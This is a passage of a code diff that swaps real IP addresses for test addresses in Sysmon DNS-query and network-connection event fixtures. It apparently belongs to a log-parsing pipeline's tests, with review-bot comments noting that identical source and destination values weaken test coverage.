Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2849,7 +2849,7 @@
 "ProcessId": "2736",
 "QueryName": "ocsp.sectigo.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "level": "information",
@@ -2871,7 +2871,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -2947,7 +2947,7 @@ "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", "User": "NT AUTHORITY\\NETWORK SERVICE", "SourceIsIpv6": "true", - "SourceIp": "a00:20f:0:0:18a2:6e00:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPortName": "domain", "DestinationIsIpv6": "true", "UtcTime": "2019-03-18 16:57:47.847", 
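Review bot: In the @@ -2947 hunk `SourceIp` now carries the same value as `DestinationIp` in @@ -2956, `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6`, and the `event.original` hunk at @@ -2972 repeats the pair. With identical endpoints this event can no longer catch a pipeline regression that swaps `source.ip` and `destination.ip` or the fields derived from them, which the old fixture (two distinct addresses) did exercise. Using two different addresses from the supported subset would keep that coverage. Whether this is the expected-output file or the input fixture is not visible from the hunk; if it is generated output, the change belongs in the input fixture and this file should be regenerated from it.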
@@ -2956,7 +2956,7 @@
 "SourcePort": "62141",
 "Image": "C:\\Windows\\System32\\svchost.exe",
 "Protocol": "udp",
- "DestinationIp": "a00:203:3000:3000:3000:3000:3000:3300"
+ "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
 "channel": "Microsoft-Windows-Sysmon/Operational",
 "opcode": "Info",
@@ -2972,7 +2972,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ea00:203:3000:3000:3000:3000:3000:3300\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event" }, 
@@ -3034,7 +3034,7 @@ "@timestamp": "2021-05-05T15:30:51.700Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "code": "3",
 "kind": "event"
 },
@@ -3062,7 +3062,7 @@
 "ProcessId": "1600",
 "Image": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe",
 "Initiated": "true",
- "DestinationIp": "40.77.226.250",
+ "DestinationIp": "89.160.20.156",
 "SourceHostname": "vagrant-2012-r2.local.crowbird.com"
 },
 "channel": "Microsoft-Windows-Sysmon/Operational",
@@ -3087,7 +3087,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "code": "3",
 "kind": "event"
 },
@@ -3123,7 +3123,7 @@
 "Image": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe",
 "SourceIsIpv6": "false",
 "SourcePort": "1139",
- "DestinationIp": "40.77.226.250",
+ "DestinationIp": "89.160.20.156",
 "DestinationPort": "443",
 "UtcTime": "2019-03-18 16:57:48.214",
 "ProcessGuid": "{42f11c3b-ccaa-5c8f-0000-0010b4e22700}"
@@ -3149,7 +3149,7 @@
 "event_data": {
 "QueryName": "ocsp.int-x3.letsencrypt.org",
 "QueryStatus": "0",
- "QueryResults": "type: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;",
+ "QueryResults": "type: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.468",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
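Review bot: In the hunk at 3149 both resolved addresses in `QueryResults` collapse to the same literal (`::ffff:89.160.20.156;::ffff:89.160.20.156;`), and the same single substitute is reused for every replaced address further down: the four Fastly answers at 3382, SourceIp and DestinationIp in 3463/3485 (`2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6` for both ends), and SourceIp and DestinationIp in 3512/3541 (`89.160.20.156` for both ends). A fixture whose source and destination are identical can no longer catch a pipeline regression that swaps `source.ip`/`destination.ip` or drops one of several DNS answers, which is what these expected-output files exist to pin. If the allowed test range is the one the commit message calls the supported subset, it presumably contains more than one usable address; picking distinct values per field, e.g. `"SourceIp": "89.160.20.156"` with `"DestinationIp": "89.160.20.157"` (constructed example, confirm against the allowed list), keeps the swap/dedup coverage the old data had.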
@@ -3166,7 +3166,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.177;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802753800Z'/\u003e\u003cEventRecordID\u003e124\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.468\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.int-x3.letsencrypt.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.int-x3.letsencrypt.org.edgesuite.net;type: 5 a771.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -3179,7 +3179,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 